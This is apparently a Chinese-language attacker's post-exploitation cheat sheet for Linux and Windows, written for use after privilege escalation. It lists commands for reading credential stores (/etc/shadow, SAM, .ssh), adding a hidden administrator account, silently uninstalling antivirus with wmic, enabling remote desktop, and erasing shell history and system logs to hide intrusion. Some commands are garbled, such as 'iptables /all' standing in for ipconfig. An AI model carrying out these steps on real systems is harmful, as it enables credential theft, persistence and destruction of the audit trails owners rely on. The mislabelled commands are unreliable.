提权成功后,需要收集目标系统的重要信息。
一、基本信息收集
(一)Linux
1、cat /etc/resolv.conf #查看DNS的配置文件
2、cat /etc/passwd #查看密码文件,所有人均可查看
3、cat /etc/shadow #查看密码文件,仅root可看
4、whoami #查看当前用户
5、who -a #当前系统登陆的用户
6、ifconfig -a #查看网卡信息
7、uname -a #查看主机版本信息
8、iptables -L -n #查看防火墙策略
9、netstat -nr #查看网关及路由
10、ps aux #列出所有进程
11、dpkg -l #列出当前系统的软件包(ii:已安装,rc:未删干净)
(二)Windows
1、iptables /all #查看所有网络适配器的TCP/IP配置
2、iptables /displaydns #查看DNS缓存记录
3、netstat -bnao #查看开放的端口及进程
4、netstat -r #查看路由
5、net view #查看共享资源列表
net view /domain #查看域中的共享资源列表
6、查看共享列表
7、net accounts #查看当前设置,密码要求,服务器角色
8、net user abc /add #新建用户abc
net localgroup administrators abc /add #将用户abc添加到本地管理员组
9、net localgroup administrators #查看本地管理员组成员
(三)工具wmic
WMIC:Windows Management Instrumentation Command
1、wmic nicconfig get ipaddress,macaddress #获取本地IP地址及mac地址
2、wmic computersystem get username #获取计算机系统用户名
3、wmic netlogin get name,lastlogon #获取用户最近一次登录时间
4、wmic process get caption,executablepath,commandline #获取服务名称、路径及运行方式
5、wmic nteventlog get path,filename,writeable #查看是否能修改删除日志
6、wmic product get name,version #获取软件版本信息
7、wmic process where name='calc.exe' call terminate #关闭计算机进程
8、wmic os get name,servicepackmajorversion #获取服务及对应数据包的版本
9、wmic product where name="<name>" call uninstall /nointeractive #卸载某些软件,如杀毒软件 ;nointeractive 后台静默运行
10、wmic share get /ALL #获取软件的共享信息
11、wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1" #设置远程桌面连接
二、敏感信息收集
Linux系统
- /etc;/usr/local/etc #配置文件放置目录
- /etc/passswd;/etc/shadow #账号密码
- .ssh;.gnupg #在linux中,以 . 开头的目录/文件都是隐藏目录/文件
- 业务数据库 ;身份认证服务器数据库
- /tmp #linux中的临时目录,存放临时数据有可能泄露机密数据
Windows系统
- SAM数据库;注册表文件
- %SYSTEMROOT%\repair\SAM #SAM进行修复操作时,保存SAM副本
- %SYSTEMROOT%\system32\config\regback\SAM #注册表备份
- 业务数据库 ; 身份认证数据库
- 临时文件目录 #病毒经常驻留的地方
- UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\
三、隐藏痕迹
Linux系统
1、cat /root/.bash_history #查看历史消息文件
2、history -c #清除命令的历史记录
3、rm .bash_history #删除存放历史记录的文件
4、查看身份认证(kali和RHEL、cent OS 操作系统的身份认证存放路径不同)
- Kali:cat /var/log/auth.log
- Red Hat 6.5/cent OS:cat /var/log/secure # 查看安全日志
5、/var/log/btmp #记录错误登录日志
/var/log/faillog #记录登录失败日志
/var/log/lastlog #记录最后一次的登录日志
禁止在登录界面显示新建的账号(Win XP)
1、查看登录界面显示的用户
2、禁止用户yxz在登录界面显示
3、再次查看登录界面显示的用户
4、清除日志信息
del %windir%\*.log /a/s/q/f #强制地、安静地、不加提示地删除日志